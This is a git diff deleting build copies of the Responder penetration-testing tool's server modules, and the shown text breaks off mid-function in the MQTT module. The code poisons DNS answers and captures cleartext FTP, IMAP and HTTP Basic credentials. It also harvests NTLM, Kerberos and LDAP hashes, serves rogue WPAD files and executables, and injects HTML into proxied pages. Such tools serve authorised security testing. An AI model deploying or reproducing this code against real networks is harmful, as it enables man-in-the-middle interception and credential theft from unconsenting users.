soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] AAAA OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - - except Exception: - pass - -# DNS Server TCP Class -class DNSTCP(BaseRequestHandler): - def handle(self): - # Break out if we don't want to respond to this host - if RespondToThisIP(self.client_address[0]) is not True: - return None - - try: - data = self.request.recv(1024) - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A": - buff = DNS_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - self.request.send(NetworkSendBufferPython2or3(buff)) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4": - buff = DNS_AnsOPT() - buff.calculate(NetworkRecvBufferPython2or3(data)) - self.request.send(NetworkSendBufferPython2or3(buff)) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV": - buff = DNS_SRV_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - self.request.send(NetworkSendBufferPython2or3(buff)) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6: - buff = DNS6_Ans() - buff.calculate(NetworkRecvBufferPython2or3(data)) - self.request.send(NetworkSendBufferPython2or3(buff)) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6: - buff = DNS6_AnsOPT() - buff.calculate(NetworkRecvBufferPython2or3(data)) - self.request.send(NetworkSendBufferPython2or3(buff)) - ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"]) - print(color("[*] [DNS] AAAA OPT Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1)) - - except Exception: - pass diff --git a/build/lib/Responder/servers/FTP.py b/build/lib/Responder/servers/FTP.py deleted file mode 100644 index 36583da..0000000 --- a/build/lib/Responder/servers/FTP.py +++ /dev/null @@ -1,59 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -from Responder.packets import FTPPacket - -class FTP(BaseRequestHandler): - def handle(self): - try: - self.request.send(NetworkSendBufferPython2or3(FTPPacket())) - data = self.request.recv(1024) - - if data[0:4] == b'USER': - User = data[5:].strip().decode("latin-1") - - Packet = FTPPacket(Code="331",Message="User name okay, need password.") - self.request.send(NetworkSendBufferPython2or3(Packet)) - data = self.request.recv(1024) - - if data[0:4] == b'PASS': - Pass = data[5:].strip().decode("latin-1") - Packet = FTPPacket(Code="530",Message="User not logged in.") - self.request.send(NetworkSendBufferPython2or3(Packet)) - - SaveToDb({ - 'module': 'FTP', - 'type': 'Cleartext', - 'client': self.client_address[0], - 'user': User, - 'cleartext': Pass, - 'fullhash': User + ':' + Pass - }) - - else: - Packet = FTPPacket(Code="502",Message="Command not implemented.") - self.request.send(NetworkSendBufferPython2or3(Packet)) - data = self.request.recv(1024) - - except Exception: - self.request.close() - pass diff --git a/build/lib/Responder/servers/HTTP.py b/build/lib/Responder/servers/HTTP.py deleted file mode 100644 index 1b0c615..0000000 --- a/build/lib/Responder/servers/HTTP.py +++ /dev/null @@ -1,320 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import struct -import codecs -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler, StreamRequestHandler -else: - from SocketServer import BaseRequestHandler, StreamRequestHandler -from base64 import b64decode, b64encode -from Responder.packets import NTLM_Challenge -from Responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer -from Responder.packets import WPADScript, ServeExeFile, ServeHtmlFile - - -# Parse NTLMv1/v2 hash. -def ParseHTTPHash(data, Challenge, client, module): - LMhashLen = struct.unpack(' 24: - NthashLen = 64 - DomainLen = struct.unpack(' 1 and settings.Config.Verbose: - print(text("[HTTP] Cookie : %s " % Cookie)) - return Cookie - return False - -def GrabReferer(data, host): - Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data) - - if Referer: - Referer = Referer.group(0).replace('Referer: ', '') - if settings.Config.Verbose: - print(text("[HTTP] Referer : %s " % color(Referer, 3))) - return Referer - return False - -def WpadCustom(data, client): - Wpad = re.search(r'(/wpad.dat|/*\.pac)', data) - if Wpad: - Buffer = WPADScript(Payload=settings.Config.WPAD_Script) - Buffer.calculate() - return str(Buffer) - return False - -def IsWebDAV(data): - dav = re.search('PROPFIND', data) - if dav: - return True - else: - return False - -def ServeOPTIONS(data): - WebDav= re.search('OPTIONS', data) - if WebDav: - Buffer = WEBDAV_Options_Answer() - return str(Buffer) - - return False - -def ServeFile(Filename): - with open (Filename, "rb") as bk: - return NetworkRecvBufferPython2or3(bk.read()) - -def RespondWithFile(client, filename, dlname=None): - if filename.endswith('.exe'): - Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname) - else: - Buffer = ServeHtmlFile(Payload = ServeFile(filename)) - - Buffer.calculate() - print(text("[HTTP] Sending file %s to %s" % (filename, client))) - return str(Buffer) - -def GrabURL(data, host): - GET = re.findall(r'(?<=GET )[^HTTP]*', data) - POST = re.findall(r'(?<=POST )[^HTTP]*', data) - POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data) - - if GET and settings.Config.Verbose: - print(text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5)))) - - if POST and settings.Config.Verbose: - print(text("[HTTP] POST request from: %-15s URL: %s" % (host, color(''.join(POST), 5)))) - - if len(''.join(POSTDATA)) > 2: - print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())) - -# Handle HTTP packet sequence. -def PacketSequence(data, client, Challenge): - NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data) - Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data) - - # Serve the .exe if needed - if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall('.exe', data)): - return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName) - - # Serve the custom HTML if needed - if settings.Config.Serve_Html: - return RespondWithFile(client, settings.Config.Html_Filename) - - WPAD_Custom = WpadCustom(data, client) - # Webdav - if ServeOPTIONS(data): - return ServeOPTIONS(data) - - if NTLM_Auth: - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == b'\x01': - GrabURL(data, client) - #GrabReferer(data, client) - GrabCookie(data, client) - - Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - Buffer.calculate() - - Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) - Buffer_Ans.calculate() - return Buffer_Ans - - if Packet_NTLM == b'\x03': - NTLM_Auth = b64decode(''.join(NTLM_Auth)) - if IsWebDAV(data): - module = "WebDAV" - else: - module = "HTTP" - ParseHTTPHash(NTLM_Auth, Challenge, client, module) - - if settings.Config.Force_WPAD_Auth and WPAD_Custom: - print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) - - return WPAD_Custom - else: - Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) - Buffer.calculate() - return Buffer - - elif NTLM_Auth2: - Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9] - if Packet_NTLM == b'\x01': - GrabURL(data, client) - #GrabReferer(data, client) - GrabCookie(data, client) - - Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - Buffer.calculate() - Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) - Buffer_Ans.calculate() - return Buffer_Ans - - if Packet_NTLM == b'\x03': - NTLM_Auth = b64decode(''.join(NTLM_Auth2)) - if IsWebDAV(data): - module = "WebDAV" - else: - module = "HTTP" - ParseHTTPHash(NTLM_Auth, Challenge, client, module) - - if settings.Config.Force_WPAD_Auth and WPAD_Custom: - print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) - - return WPAD_Custom - else: - Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) - Buffer.calculate() - return Buffer - - elif Basic_Auth: - ClearText_Auth = b64decode(''.join(Basic_Auth)) - - GrabURL(data, client) - #GrabReferer(data, client) - GrabCookie(data, client) - - SaveToDb({ - 'module': 'HTTP', - 'type': 'Basic', - 'client': client, - 'user': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[0], - 'cleartext': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[1], - }) - - if settings.Config.Force_WPAD_Auth and WPAD_Custom: - if settings.Config.Verbose: - print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:",""))) - - return WPAD_Custom - else: - Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) - Buffer.calculate() - return Buffer - else: - if settings.Config.Basic: - r = IIS_Basic_401_Ans() - r.calculate() - Response = r - if settings.Config.Verbose: - print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:",""))) - - else: - r = IIS_Auth_401_Ans() - r.calculate() - Response = r - if settings.Config.Verbose: - print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:",""))) - - return Response - -# HTTP Server class -class HTTP(BaseRequestHandler): - - def handle(self): - try: - Challenge = RandomChallenge() - while True: - self.request.settimeout(3) - remaining = 10*1024*1024 #setting max recieve size - data = '' - while True: - buff = '' - buff = NetworkRecvBufferPython2or3(self.request.recv(8092)) - if buff == '': - break - data += buff - remaining -= len(buff) - #check if we recieved the full header - if data.find('\r\n\r\n') != -1: - #we did, now to check if there was anything else in the request besides the header - if data.find('Content-Length') == -1: - #request contains only header - break - else: - #searching for that content-length field in the header - for line in data.split('\r\n'): - if line.find('Content-Length') != -1: - line = line.strip() - remaining = int(line.split(':')[1].strip()) - len(data) - if remaining <= 0: - break - if data == "": - break - #now the data variable has the full request - Buffer = WpadCustom(data, self.client_address[0]) - - if Buffer and settings.Config.Force_WPAD_Auth == False: - self.request.send(NetworkSendBufferPython2or3(Buffer)) - self.request.close() - if settings.Config.Verbose: - print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0].replace("::ffff:",""))) - - else: - Buffer = PacketSequence(data,self.client_address[0], Challenge) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - - except: - pass - - diff --git a/build/lib/Responder/servers/HTTP_Proxy.py b/build/lib/Responder/servers/HTTP_Proxy.py deleted file mode 100644 index 5c58982..0000000 --- a/build/lib/Responder/servers/HTTP_Proxy.py +++ /dev/null @@ -1,358 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - import urllib.parse as urlparse - import http.server as BaseHTTPServer -else: - import urlparse - import BaseHTTPServer - -import select -import zlib -from Responder.servers.HTTP import RespondWithFile - - -IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ] - -def InjectData(data, client, req_uri): - - # Serve the .exe if needed - if settings.Config.Serve_Always: - return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName) - - # Serve the .exe if needed and client requested a .exe - if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'): - return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri)) - - if len(data.split(b'\r\n\r\n')) > 1: - try: - Headers, Content = data.split(b'\r\n\r\n') - except: - return data - - RedirectCodes = ['HTTP/1.1 300', 'HTTP/1.1 301', 'HTTP/1.1 302', 'HTTP/1.1 303', 'HTTP/1.1 304', 'HTTP/1.1 305', 'HTTP/1.1 306', 'HTTP/1.1 307'] - if set(RedirectCodes) & set(Headers): - return data - - Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers)) - - if b'content-encoding: gzip' in Headers.lower(): - Content = zlib.decompress(Content, 16+zlib.MAX_WBITS) - - if b'content-type: text/html' in Headers.lower(): - if settings.Config.Serve_Html: # Serve the custom HTML if needed - return RespondWithFile(client, settings.Config.Html_Filename) - - - HasBody = re.findall(b'(]*>)', Content, re.IGNORECASE) - - if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'): - if settings.Config.Verbose: - print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))) - - Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1'))) - - if b'content-encoding: gzip' in Headers.lower(): - Content = zlib.compress(Content) - - Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content))) - data = Headers +b'\r\n\r\n'+ Content - - else: - if settings.Config.Verbose: - print(text("[PROXY] Returning unmodified HTTP response")) - - return data - -class ProxySock: - def __init__(self, socket, proxy_host, proxy_port) : - - # First, use the socket, without any change - self.socket = socket - - # Create socket (use real one) - self.proxy_host = proxy_host - self.proxy_port = proxy_port - - # Copy attributes - self.family = socket.family - self.type = socket.type - self.proto = socket.proto - - def connect(self, address) : - - # Store the real remote adress - self.host, self.port = address - - # Try to connect to the proxy - for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo( - self.proxy_host, - self.proxy_port, - 0, 0, socket.SOL_TCP): - try: - # Replace the socket by a connection to the proxy - self.socket = socket.socket(family, socktype, proto) - self.socket.connect(sockaddr) - except socket.error as msg: - if self.socket: - self.socket.close() - self.socket = None - continue - break - if not self.socket : - raise socket.error(msg) - - # Ask him to create a tunnel connection to the target host/port - self.socket.send( - ("CONNECT %s:%d HTTP/1.1\r\n" + - "Host: %s:%d\r\n\r\n") % (self.host, self.port, self.host, self.port)) - - # Get the response - resp = self.socket.recv(4096) - - # Parse the response - parts = resp.split() - - # Not 200 ? - if parts[1] != "200": - print(color("[!] Error response from upstream proxy: %s" % resp, 1)) - pass - - # Wrap all methods of inner socket, without any change - def accept(self) : - return self.socket.accept() - - def bind(self, *args) : - return self.socket.bind(*args) - - def close(self) : - return self.socket.close() - - def fileno(self) : - return self.socket.fileno() - - def getsockname(self) : - return self.socket.getsockname() - - def getsockopt(self, *args) : - return self.socket.getsockopt(*args) - - def listen(self, *args) : - return self.socket.listen(*args) - - def makefile(self, *args) : - return self.socket.makefile(*args) - - def recv(self, *args) : - return self.socket.recv(*args) - - def recvfrom(self, *args) : - return self.socket.recvfrom(*args) - - def recvfrom_into(self, *args) : - return self.socket.recvfrom_into(*args) - - def recv_into(self, *args) : - return self.socket.recv_into(buffer, *args) - - def send(self, *args) : - try: return self.socket.send(*args) - except: pass - - def sendall(self, *args) : - return self.socket.sendall(*args) - - def sendto(self, *args) : - return self.socket.sendto(*args) - - def setblocking(self, *args) : - return self.socket.setblocking(*args) - - def settimeout(self, *args) : - return self.socket.settimeout(*args) - - def gettimeout(self) : - return self.socket.gettimeout() - - def setsockopt(self, *args): - return self.socket.setsockopt(*args) - - def shutdown(self, *args): - return self.socket.shutdown(*args) - - # Return the (host, port) of the actual target, not the proxy gateway - def getpeername(self) : - return self.host, self.port - -# Inspired from Tiny HTTP proxy, original work: SUZUKI Hisao. -class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler): - __base = BaseHTTPServer.BaseHTTPRequestHandler - __base_handle = __base.handle - - rbufsize = 0 - - def handle(self): - (ip, port) = self.client_address[0], self.client_address[1] - if settings.Config.Verbose: - print(text("[PROXY] Received connection from %s" % self.client_address[0].replace("::ffff:",""))) - self.__base_handle() - - def _connect_to(self, netloc, soc): - i = netloc.find(':') - if i >= 0: - host_port = netloc[:i], int(netloc[i+1:]) - else: - host_port = netloc, 80 - try: soc.connect(host_port) - except socket.error as arg: - try: msg = arg[1] - except: msg = arg - self.send_error(404, msg) - return 0 - return 1 - - def socket_proxy(self, af, fam): - Proxy = settings.Config.Upstream_Proxy - Proxy = Proxy.rstrip('/').replace('http://', '').replace('https://', '') - Proxy = Proxy.split(':') - - try: Proxy = (Proxy[0], int(Proxy[1])) - except: Proxy = (Proxy[0], 8080) - - soc = socket.socket(af, fam) - return ProxySock(soc, Proxy[0], Proxy[1]) - - def do_CONNECT(self): - - if settings.Config.Upstream_Proxy: - soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM) - else: - soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - try: - if self._connect_to(self.path, soc): - self.wfile.write(NetworkSendBufferPython2or3(self.protocol_version +" 200 Connection established\r\n")) - self.wfile.write(NetworkSendBufferPython2or3("Proxy-agent: %s\r\n"% self.version_string())) - self.wfile.write(NetworkSendBufferPython2or3("\r\n")) - try: - self._read_write(soc, 300) - except: - pass - except: - raise - pass - - finally: - soc.close() - self.connection.close() - - def do_GET(self): - (scm, netloc, path, params, query, fragment) = urlparse.urlparse(self.path, 'http') - - if netloc in IgnoredDomains: - #self.send_error(200, "OK") - return - - if scm not in 'http' or fragment or not netloc: - self.send_error(400, "bad url %s" % self.path) - return - - if settings.Config.Upstream_Proxy: - soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM) - else: - soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - try: - URL_Unparse = urlparse.urlunparse(('', '', path, params, query, '')) - - if self._connect_to(netloc, soc): - soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))) - - Cookie = self.headers['Cookie'] if "Cookie" in self.headers else '' - - if settings.Config.Verbose: - print(text("[PROXY] Client : %s" % color(self.client_address[0].replace("::ffff:",""), 3))) - print(text("[PROXY] Requested URL : %s" % color(self.path, 3))) - print(text("[PROXY] Cookie : %s" % Cookie)) - - self.headers['Connection'] = 'close' - del self.headers['Proxy-Connection'] - del self.headers['If-Range'] - del self.headers['Range'] - - for k, v in self.headers.items(): - soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v))) - soc.send(NetworkSendBufferPython2or3("\r\n")) - - try: - self._read_write(soc, netloc) - except: - pass - - except: - pass - - finally: - soc.close() - self.connection.close() - - def _read_write(self, soc, netloc='', max_idling=30): - iw = [self.connection, soc] - ow = [] - count = 0 - while 1: - count += 1 - (ins, _, exs) = select.select(iw, ow, iw, 1) - if exs: - break - if ins: - for i in ins: - if i is soc: - out = self.connection - try: - data = i.recv(4096) - if len(data) > 1: - data = InjectData(data, self.client_address[0], self.path) - except: - pass - else: - out = soc - try: - data = i.recv(4096) - - if self.command == b'POST' and settings.Config.Verbose: - print(text("[PROXY] POST Data : %s" % data)) - except: - pass - if data: - try: - out.send(data) - - count = 0 - except: - pass - if count == max_idling: - break - return None - - - do_HEAD = do_GET - do_POST = do_GET - do_PUT = do_GET - do_DELETE=do_GET - diff --git a/build/lib/Responder/servers/IMAP.py b/build/lib/Responder/servers/IMAP.py deleted file mode 100644 index 7bd4637..0000000 --- a/build/lib/Responder/servers/IMAP.py +++ /dev/null @@ -1,48 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sys -from Responder.utils import * -if (sys.version_info > (3, 0)): - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from Responder.packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd - -class IMAP(BaseRequestHandler): - def handle(self): - try: - self.request.send(NetworkSendBufferPython2or3(IMAPGreeting())) - data = self.request.recv(1024) - if data[5:15] == b'CAPABILITY': - RequestTag = data[0:4] - self.request.send(NetworkSendBufferPython2or3(IMAPCapability())) - self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=RequestTag.decode("latin-1")))) - data = self.request.recv(1024) - - if data[5:10] == b'LOGIN': - Credentials = data[10:].strip().decode("latin-1").split('"') - SaveToDb({ - 'module': 'IMAP', - 'type': 'Cleartext', - 'client': self.client_address[0], - 'user': Credentials[1], - 'cleartext': Credentials[3], - 'fullhash': Credentials[1]+":"+Credentials[3], - }) - - except Exception: - pass diff --git a/build/lib/Responder/servers/Kerberos.py b/build/lib/Responder/servers/Kerberos.py deleted file mode 100644 index fe2242b..0000000 --- a/build/lib/Responder/servers/Kerberos.py +++ /dev/null @@ -1,149 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import codecs -import struct -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - - -def ParseMSKerbv5TCP(Data): - MsgType = Data[21:22] - EncType = Data[43:44] - MessageType = Data[32:33] - - if MsgType == b'\x0a' and EncType == b'\x17' and MessageType ==b'\x02': - if Data[49:53] == b'\xa2\x36\x04\x34' or Data[49:53] == b'\xa2\x35\x04\x33': - HashLen = struct.unpack('. -import sys -if (sys.version_info > (3, 0)): - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from Responder.packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge, CLDAPNetlogon -from Responder.utils import * -import struct -import codecs -import random - -def CalculateDNSName(name): - if isinstance(name, bytes): - name = name.decode('latin-1') - name = name.split(".") - DomainPrefix = struct.pack('B', len(name[0])).decode('latin-1')+name[0] - Dnslen = '' - for x in name: - if len(x) >=1: - Dnslen += struct.pack('B', len(x)).decode('latin-1')+x - - return Dnslen, DomainPrefix - -def ParseCLDAPNetlogon(data): - try: - Dns = data.find(b'DnsDomain') - if Dns == -1: - return False - DnsName = data[Dns+9:] - DnsGuidOff = data.find(b'DomainGuid') - if DnsGuidOff == -1: - return False - Guid = data[DnsGuidOff+10:] - if Dns: - DomainLen = struct.unpack(">B", DnsName[1:2])[0] - DomainName = DnsName[2:2+DomainLen] - - if Guid: - DomainGuidLen = struct.unpack(">B", Guid[1:2])[0] - DomainGuid = Guid[2:2+DomainGuidLen] - return DomainName, DomainGuid - except: - pass - - -def ParseSearch(data): - TID = data[8:9].decode('latin-1') - if re.search(b'Netlogon', data): - NbtName = settings.Config.MachineName - TID = NetworkRecvBufferPython2or3(data[8:10]) - if TID[1] == "\x63": - TID = "\x00"+TID[0] - DomainName, DomainGuid = ParseCLDAPNetlogon(data) - DomainGuid = NetworkRecvBufferPython2or3(DomainGuid) - t = CLDAPNetlogon(MessageIDASNStr=TID ,CLDAPMessageIDStr=TID, NTLogonDomainGUID=DomainGuid, NTLogonForestName=CalculateDNSName(DomainName)[0],NTLogonPDCNBTName=CalculateDNSName(NbtName)[0], NTLogonDomainNBTName=CalculateDNSName(NbtName)[0],NTLogonDomainNameShort=CalculateDNSName(DomainName)[1]) - t.calculate() - return str(t) - - if re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data): - return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID)) - - elif re.search(b'(?i)(objectClass0*.*supportedCapabilities)', data): - return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID)) - - elif re.search(b'(objectClass)', data): - return str(LDAPSearchDefaultPacket(MessageIDASNStr=TID)) - -def ParseLDAPHash(data,client, Challenge): #Parse LDAP NTLMSSP v1/v2 - SSPIStart = data.find(b'NTLMSSP') - SSPIString = data[SSPIStart:] - LMhashLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] - SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') - DomainLen = struct.unpack('i',data[2:6])[0] - if Operation == b'\x84': - Operation = data[9:10] - sasl = data[20:21] - OperationHeadLen = struct.unpack('>i',data[11:15])[0] - LDAPVersion = struct.unpack('i',data[2:6])[0] - MessageSequence = struct.unpack('i',data[11:15])[0] - LDAPVersion = struct.unpack('. - -from Responder.utils import settings, NetworkSendBufferPython2or3, SaveToDb - -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -from Responder.packets import MQTTv3v4ResponsePacket, MQTTv5ResponsePacket - -#Read N byte integer -def readInt(data, offset, numberOfBytes): - value = int.from_bytes(data[offset:offset+numberOfBytes], 'big') - offset += numberOfBytes - return (value, offset) - -#Read binary data -def readBinaryData(data, offset): - - #Read number of bytes - length, offset = readInt(data, offset, 2) - - #Read bytes - value = data[offset:offset+length] - offset += length - - return (value, offset) - -#Same as readBinaryData() but without reading data -def skipBinaryDataString(data, offset): - length, offset = readInt(data, offset, 2) - offset += length - return offset - -#Read UTF-8 encoded string -def readString(data, offset): - value, offset = readBinaryData(data, offset) - - return (value.decode('utf-8'), offset) - -#Read variable byte integer -#(https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901011) -def readVariableByteInteger(data, offset): - multiplier = 1 - value = 0 - while True: - encodedByte = data[offset] - offset += 1 - - value = (encodedByte & 127) * multiplier - - if (multiplier > 128 * 128 * 128): - return None - - multiplier *= 128 - - if(encodedByte & 128 == 0): - break - - return (value, offset) - -class MqttPacket: - - USERNAME_FLAG = 0x80 - PASSWORD_FLAG = 0x40 - WILL_FLAG = 0x04 - - def __init__(self, data): - self.__isValid = True - - controllPacketType, offset = readInt(data, 0, 1) - - #check if CONNECT packet type - if controllPacketType != 0x10: - self.__isValid = False - return - - #Remaining length - remainingLength, offset = readVariableByteInteger(data, offset) - - #Protocol name - protocolName, offset = readString(data, offset) - - #Check protocol name - if protocolName != "MQTT" and protocolName != "MQIsdp": - self.__isValid = False - return - - #Check protocol version - self.__protocolVersion, offset = readInt(data, offset, 1) - - #Read connect flag register - connectFlags, offset = readInt(data, offset, 1) - - #Read keep alive (skip) - offset += 2 - - #MQTTv5 implements properties - if self.__protocolVersion > 4: - - #Skip all properties - propertiesLength, offset = readVariableByteInteger(data, offset) - offset+=propertiesLength - - #Get Client ID - self.clientId, offset = readString(data, offset) - - if (self.clientId == ""): - self.clientId = "" - - #Skip Will - if (connectFlags & self.WILL_FLAG) > 0: - - #MQTT v5 implements properties - if 